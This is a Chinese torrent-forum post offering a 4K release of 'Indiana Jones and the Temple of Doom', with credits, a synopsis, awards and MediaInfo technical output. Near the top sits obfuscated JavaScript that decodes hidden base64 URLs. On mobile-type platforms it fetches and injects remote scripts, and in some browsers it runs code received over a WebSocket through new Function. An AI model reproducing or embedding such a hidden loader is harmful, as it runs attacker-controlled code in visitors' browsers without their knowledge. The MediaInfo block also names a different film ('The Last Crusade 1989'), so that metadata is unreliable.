夺宝奇兵2[国英语音轨/中文字幕].Indiana.Jones.and.the.Temple.of.Doom.1984.2160p.18.09GB.4K迅雷下载

版主小s 2月前 238

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 夺宝奇兵2 / 印地安纳·琼斯和魔域奇兵 / 夺宝奇兵2:魔域奇兵 / 魔域奇兵 / 印地安纳·琼斯之魔域奇兵 / 印地安纳·琼斯与墓室 / 魔宫传奇

◎片 名 Indiana Jones and the Temple of Doom

◎年 代 1984

◎产 地 美国 / 英国

◎类 别 动作 / 冒险

◎语 言 英语 / 僧伽罗语 / 上海话 / 粤语

◎上映日期 1984-05-23(美国)

◎IMDb链接 https://www.imdb.com/title/tt0087469/

◎豆瓣评分 7.8/10 (47032人评价)

◎豆瓣链接 https://movie.douban.com/subject/1301434/

◎片 长 118分钟

◎导 演 史蒂文·斯皮尔伯格 Steven Spielberg (id:1054440)

◎编 剧 威拉德·赫依克 Willard Huyck (id:1050370)

格洛丽亚·卡茨 Gloria Katz (id:1288204)

乔治·卢卡斯 George Lucas (id:1054507)

◎演 员 哈里森·福特 Harrison Ford (id:1009238)

凯特·卡普肖 Kate Capshaw (id:1040572)

关继威 Jonathan Ke Quan (id:1022565)

阿莫瑞什·普瑞 Amrish Puri (id:1054235)

罗珊·塞斯 Roshan Seth (id:1137886)

乔治·卢卡斯 George Lucas (id:1054507)

巴斯卡尔·帕特尔 Bhasker Patel (id:1065963)

里克·扬 Ric Young (id:1275648)

丹·艾克罗伊德 Dan Aykroyd (id:1010562)

叶西园 David Yip (id:1167632)

西德尼·甘尼斯 Sidney Ganis (id:1014575)

菲利普·丹 Philip Tan (id:1298892)

乔宏 Roy Chiao (id:1032432)

菲利普·斯通 Philip Stone (id:1149637)

安东尼·鲍威尔 Anthony Powell (id:1131122)

帕特·罗奇 Pat Roach (id:1045132)

Denavaka Hamine Denavaka Hamine (id:1093689)

弗兰克·马歇尔 Frank Marshall (id:1049939)

Arthur F. Repola Arthur F. Repola (id:1023816)

罗伯特·沃茨 Robert Watts (id:1300525)

乔治·卢卡斯 George Lucas (id:1054507)

凯瑟琳·肯尼迪 Kathleen Kennedy (id:1019168)

弗兰克·马歇尔 Frank Marshall (id:1049939)

约翰·威廉姆斯 John Williams (id:1054692)

道格拉斯·斯洛科姆 Douglas Slocombe (id:1007237)

乔治·卢卡斯 George Lucas (id:1054507)

迈克尔·卡恩 Michael Kahn (id:1037019)

迈克·芬顿 Mike Fenton (id:1283570)

玛丽·塞尔维 Mary Selway (id:1036236)

彼得·霍威特 Peter Howitt (id:1287039)

艾略特·斯科特 Elliot Scott (id:1012786)

安东尼·鲍威尔 Anthony Powell (id:1131122)

琳达·古拉西希 Lynda Gurasich (id:1285651)

彼得·罗勃-金 Peter Robb-King (id:1295741)

科林·贾米森 Colin Jamison (id:1287572)

琳达·德维塔 Linda DeVetta (id:1282321)

汤姆·史密斯 Tom Smith (id:1157406)

伊安·布莱斯 Ian Bryce (id:1279526)

弗兰克·马歇尔 Frank Marshall (id:1049939)

Carlos Gil Carlos Gil (id:1094312)

Louis Race Louis Race (id:1035720)

迈克尔·D·穆尔 Michael D. Moore (id:1028085)

大卫·汤布林 David Tomblin (id:1028731)

Rick Fichter Rick Fichter (id:1283660)

Lance Brackett Lance Brackett (id:1070546)

比尔·乔治 Bill George (id:1284713)

John McLeod John McLeod (id:1291681)

杰克·莫多万 Jack Mongovan (id:1292344)

Charlie Mullen Charlie Mullen (id:1292681)

布鲁斯·尼科尔森 Bruce Nicholson (id:1293146)

Dave Childers Dave Childers (id:1072607)

迈克尔·J·麦卡利斯特尔 Michael J. McAlister (id:1291408)

克里斯托弗·埃文斯 Christopher Evans (id:1283336)

Ned Gorman Ned Gorman (id:1285204)

芭芭拉·布伦南 Barbara Brennan (id:1279246)

克莱格·巴朗 Craig Barron (id:1277981)

爱德华·赫希 Edward Hirsh (id:1286690)

Suki Stern Suki Stern (id:1156154)

保罗·哈特森 Paul Huston (id:1287204)

埃德·琼斯 Ed Jones (id:1287861)

迈克尔·欧文斯 Michael Owens (id:1293758)

菲尔 蒂贝特 Phil Tippett (id:1299349)

约翰·埃利斯 John Ellis (id:1305506)

大卫·芬奇 David Fincher (id:1012521)

布鲁斯·沃尔特斯 Bruce Walters (id:1300370)

Michael Gleason Michael Gleason (id:1013136)

Charles Bailey Charles Bailey (id:1277693)

Pat Sweeney Pat Sweeney (id:1298721)

Arthur F. Repola Arthur F. Repola (id:1023816)

David Sosalla David Sosalla (id:1298080)

Tom St. Amand Tom St. Amand (id:1298210)

Michael Pangrazio Michael Pangrazio (id:1293881)

丹尼斯·穆伦 Dennis Muren (id:1041635)

洛尔恩·彼得森 Lorne Peterson (id:1294386)

Thomas G. Smith Thomas G. Smith (id:1297955)

托马斯·罗塞特 Thomas Rosseter (id:1296146)

◎标 签 冒险 / 美国 / 动作 / 斯皮尔伯格 / 探险 / 经典 / 美国电影 / 1984

◎简 介

中国,印第安纳琼斯博士(HarrisonFord饰)与上海黑帮老大交易,对方在换得努尔哈赤的骨灰后便背信弃义,欲灭琼斯之口。关键时刻,机灵小鬼豆丁(JonathanKeQuan饰)救下琼斯博士和无故卷进的一位歌女威莉(KateCapshaw饰)。

由于三人乘坐的飞机失事,跳机后,乘着橡皮艇,他们竟漂流到了印度的一个村子。这里河水干涸,庄稼尽毁,饥荒横行,民不聊生。当地人将之归咎为彭高皇宫的妖孽作怪,并将“从天而降”的琼斯一行视为神灵的化身,他们请求琼斯帮他们拿回被掳走的圣石和所有的小孩子。

魔宫果然充满古怪,统治者是个小屁孩,贵族们吃水蛭、巨蟒、甲虫、猴脑,皇宫内部更是机关重重,误打误撞间,他们目睹到血腥的邪教献祭仪式……这一仗注定艰苦异常!

◎获奖情况 (共2项)

第57届奥斯卡金像奖 (1985)

最佳视觉效果

└──丹尼斯·穆伦 (id:1041635)

└──迈克尔·J·麦卡利斯特尔 (id:1291408)

└──洛尔恩·彼得森 (id:1294386)

└──乔治·吉布斯 (id:1284807)

最佳原创配乐(提名)

└──约翰·威廉姆斯 (id:1054692)

  1. General

  2. Unique ID : 172996996047513781833333913494309269799 (0x8226026E70E02859BBCED830E1877127)

  3. Complete name : Indiana.Jones.and.the.Temple.of.Doom.1984.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.2Audio.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 18.1 GiB

  7. Duration : 1 h 58 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 21.9 Mb/s

  10. Movie name : Indiana Jones and the Last Crusade 1989 2160p HDR UHD BluRay TrueHD 7.1 Atmos 2Audio x265-10bit-HDS

  11. Encoded date : UTC 2021-06-17 13:27:07

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 58 min

  22. Bit rate : 15.9 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 632 pixels

  25. Display aspect ratio : 2.35:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.106

  32. Stream size : 13.2 GiB (73%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 1 h 58 min

  52. Bit rate mode : Variable

  53. Bit rate : 4 320 kb/s

  54. Maximum bit rate : 6 240 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.57 GiB (20%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 11

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Audio #2

  69. ID : 3

  70. Format : DTS

  71. Format/Info : Digital Theater Systems

  72. Codec ID : A_DTS

  73. Duration : 1 h 58 min

  74. Bit rate mode : Constant

  75. Bit rate : 1 510 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : C L R Ls Rs LFE

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 93.750 FPS (512 SPF)

  80. Bit depth : 24 bits

  81. Compression mode : Lossy

  82. Stream size : 1.25 GiB (7%)

  83. Title : Mandarin

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Text #1

  88. ID : 4

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 52 min

  94. Bit rate : 17.7 kb/s

  95. Count of elements : 1734

  96. Stream size : 14.2 MiB (0%)

  97. Title : ENG

  98. Language : English

  99. Default : Yes

  100. Forced : No


  101. Text #2

  102. ID : 5

  103. Format : PGS

  104. Muxing mode : zlib

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 1 h 57 min

  108. Bit rate : 10.6 kb/s

  109. Count of elements : 1244

  110. Stream size : 8.93 MiB (0%)

  111. Title : CHT

  112. Language : Chinese

  113. Default : No

  114. Forced : No


  115. Text #3

  116. ID : 6

  117. Format : PGS

  118. Muxing mode : zlib

  119. Codec ID : S_HDMV/PGS

  120. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  121. Duration : 1 h 57 min

  122. Bit rate : 11.3 kb/s

  123. Count of elements : 1510

  124. Stream size : 9.49 MiB (0%)

  125. Title : CHT

  126. Language : Chinese

  127. Default : No

  128. Forced : No


  129. Text #4

  130. ID : 7

  131. Format : PGS

  132. Muxing mode : zlib

  133. Codec ID : S_HDMV/PGS

  134. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  135. Duration : 1 h 57 min

  136. Bit rate : 12.5 kb/s

  137. Count of elements : 1606

  138. Stream size : 10.6 MiB (0%)

  139. Title : CHS

  140. Language : Chinese

  141. Default : No

  142. Forced : No


  143. Text #5

  144. ID : 8

  145. Format : PGS

  146. Muxing mode : zlib

  147. Codec ID : S_HDMV/PGS

  148. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  149. Duration : 1 h 52 min

  150. Bit rate : 14.9 kb/s

  151. Count of elements : 1674

  152. Stream size : 12.0 MiB (0%)

  153. Title : CHS

  154. Language : Chinese

  155. Default : No

  156. Forced : No


  157. Text #6

  158. ID : 9

  159. Format : PGS

  160. Muxing mode : zlib

  161. Codec ID : S_HDMV/PGS

  162. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  163. Duration : 1 h 52 min

  164. Bit rate : 15.2 kb/s

  165. Count of elements : 1674

  166. Stream size : 12.3 MiB (0%)

  167. Title : CHT

  168. Language : Chinese

  169. Default : No

  170. Forced : No


  171. Text #7

  172. ID : 10

  173. Format : PGS

  174. Muxing mode : zlib

  175. Codec ID : S_HDMV/PGS

  176. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  177. Duration : 1 h 52 min

  178. Bit rate : 25.5 kb/s

  179. Count of elements : 1674

  180. Stream size : 20.6 MiB (0%)

  181. Title : CHS&ENG

  182. Language : Chinese

  183. Default : No

  184. Forced : No


  185. Text #8

  186. ID : 11

  187. Format : PGS

  188. Muxing mode : zlib

  189. Codec ID : S_HDMV/PGS

  190. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  191. Duration : 1 h 52 min

  192. Bit rate : 25.8 kb/s

  193. Count of elements : 1674

  194. Stream size : 20.8 MiB (0%)

  195. Title : CHT&ENG

  196. Language : Chinese

  197. Default : No

  198. Forced : No


  199. Menu

  200. 00:00:00.000 : en:Chapter 01

  201. 00:02:55.049 : en:Chapter 02

  202. 00:08:07.278 : en:Chapter 03

  203. 00:10:52.735 : en:Chapter 04

  204. 00:12:51.479 : en:Chapter 05

  205. 00:16:00.542 : en:Chapter 06

  206. 00:19:50.189 : en:Chapter 07

  207. 00:26:28.836 : en:Chapter 08

  208. 00:28:42.971 : en:Chapter 09

  209. 00:31:49.031 : en:Chapter 10

  210. 00:35:20.326 : en:Chapter 11

  211. 00:38:56.916 : en:Chapter 12

  212. 00:41:20.518 : en:Chapter 13

  213. 00:46:24.322 : en:Chapter 14

  214. 00:50:42.956 : en:Chapter 15

  215. 00:52:06.581 : en:Chapter 16

  216. 00:56:08.364 : en:Chapter 17

  217. 00:59:57.217 : en:Chapter 18

  218. 01:05:57.077 : en:Chapter 19

  219. 01:09:52.020 : en:Chapter 20

  220. 01:13:08.550 : en:Chapter 21

  221. 01:17:08.289 : en:Chapter 22

  222. 01:24:01.953 : en:Chapter 23

  223. 01:27:33.331 : en:Chapter 24

  224. 01:29:21.104 : en:Chapter 25

  225. 01:35:03.447 : en:Chapter 26

  226. 01:39:23.873 : en:Chapter 27

  227. 01:41:51.313 : en:Chapter 28

  228. 01:43:38.795 : en:Chapter 29

  229. 01:49:57.631 : en:Chapter 30

  230. 01:53:10.867 : en:Chapter 31




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 动作 冒险

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回